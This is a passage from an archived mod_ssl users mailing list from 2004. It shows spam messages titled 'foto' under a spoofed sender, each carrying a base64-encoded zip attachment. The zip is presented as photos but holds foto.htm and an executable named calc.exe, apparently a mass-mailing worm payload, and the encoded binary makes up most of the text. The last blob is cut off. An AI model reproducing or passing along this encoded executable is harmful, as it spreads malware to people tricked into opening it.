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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------obaeuoogwcpkvzpheodz--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 06:55:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D159CA8963; Wed,  1 Sep 2004 06:55:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from butterfly.org (pa-bethlprk-cad2-grp1a-7-232.pittpa.adelphia.net [24.49.158.232])
	by master.modssl.org (Postfix) with SMTP id C1001A8934
	for ; Wed,  1 Sep 2004 06:55:23 +0200 (CEST)
Date: Wed, 01 Sep 2004 00:52:38 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qipkvgnwuugbgxwyhhvt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qipkvgnwuugbgxwyhhvt
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------qipkvgnwuugbgxwyhhvt
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------qipkvgnwuugbgxwyhhvt--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 07:06:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A40CA8995; Wed,  1 Sep 2004 07:06:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from TUSCOLA-CO.com (pm913-08.dialip.mich.net [198.109.186.18])
	by master.modssl.org (Postfix) with SMTP id 6112CA8943
	for ; Wed,  1 Sep 2004 07:06:15 +0200 (CEST)
Date: Wed, 01 Sep 2004 01:06:10 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------pvpmxeerarqstkfmakqh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------pvpmxeerarqstkfmakqh
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------pvpmxeerarqstkfmakqh
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQKAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsDBBQA
AAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAMS9jYWxjLmV4Ze1af3BUx33fEzKWjQJqAiWmaSwI
dokbnYV0R3FCG52lk2Ei4KyTEDay4d291b13evf2+f2QdGrcypZJQzU4mubndGj+SF1PJk2Z
tIUp8UyCMNQ2DZlCxtN67I6HkIz7YlzXY2isaVWun933Tpy4PZk0zXjcYeH7fbvf7+53v/vd
X9/vnrY/SEiEEFIHKJUI6SBBKn+P9PxwLamReJ1UkpCeyBLyfNemRJl+nqyILIvc1EjqUYgG
tAc+CNQEaA5bNgWd1odtyl+yL1Rm/tMU1J3/zn9E0iBvSy0Ff5kEudoi7KhLx1x8n1oSKsQH
UFcl4nzUVhVXIeRMXUAQ9ZYurNeB/9GgGrn0caBWwAbArVX1Zv43Q1ks9U+9sWsgPfVow5TX
OOD/Hkazf2bavWP6i3PtM5OnS28fnvg0cX9tIO2vBuvAUs5s+KuLF47xNbNn78Onn23gIiZP
zeYJ/tUBlnCzdZS8Bn8GYz6QnOvw6k8/2wj2weRsquQ1lbzGkjfnz4HLv0/iK8TxSkKWn9bO
7uog2qNA/p5SqbRsZsUT/0h49YY80T4JE/p/GsjeD87fCk6j/z1Bupyv1/iETJe8y3neQWkV
F3YgOdv+yrIZ9w857bJQYVYw/wVM0PuC3n4bMjQLuZR/J7IH+9/q5Q1mU3x4ov5LQtgbaLI2
Xyp5b/hRXi/pp3j+PMYx9ZDPs38X4Qtogoh2QVcvoikf8SFe6+TFNdpPeZf/gBKkNWpNv4Vx
vYzSxct75u06dzA5l9JiomWD/xoX+rMBtDqL3HRHShTyEViFtAbCT0cCsx6NcIvWcymPnXrx
Sqn0/P6XgDdEiJgo/+PIHNjPGQcFI1U6ygv+fYE6Gw/un+NUbR3XcVAQvYap/edBPH1yYZM1
XOcfhIXjmI32mdMntfp5XS+ApC2DfkHxFs4Q3Dd3Q3nif4dwnQRTkPzHeANUmPBnIVKr47k3
eU60ElZ7kldZzWWK4lFenCALuOROoHXzVfr/my8kd43/OiT9+fldIb0U51l/Elyochsanind
sa8ZjDt2C9wncJPAKwX+sMAfEbhZ4PUCbxD4EwIPCtwqcEzgzQJvEbhD4C6BtwrcI3BK4AaB
icD1wL/KdGgdId8GPLkuKMdw2qcADwNswOcBhwCHAacAFwCXAfWovwawDrAZ0AVIAQYBd4K/
BvAioDG8PY40X+1TQ50mlJ+qoH2f919Rfi90XEM6DebQrYqpGpSsJ53MKnbrBk3gQO60qeLS
oLQtLPUxZmjUsNrb0qZiORrDhTBBkmO6m7JZljoO+XdyH3U5oZOptE9DK5XcHAFtO1M9Q4jb
oRQgktxylRr0D9rtnMZFJVTV5uLIFk5JFx2XFrp0m2ZdZhcT5KlID1PUHj1jK7xIzkV2WtQs
6/BqJMy1t3XrtgMdz1+l7OC3WKwuTV0xNNe19YznUgdS9tWlDUot8oW6AUV3u5md1s2cQXdm
8uiXfL1uwNYDg5CjdYbj2lnFRavvBvmCpSfIcZE3qAn6MLVNarS3RVXDIMRzqF3OO5oxqli6
KExEemlOTMJnaJFMipIwNYoJcpiXoeouxfBocgxSFXUETcuSbqRfPI1S21GdKB2jZFBlts7c
IJ9THxkaFdntD04T7uRwx4V7iMfClh3XIX0CsPz2Z5aTI7f8cO2xCHzJPk13mi2b5Wyl0JxV
TJO5zRnabHtms242d+1MNxewVaIf+MCt60MZgYdZT55b4GEuXys8zAYyf2rctYpUeJjILeZh
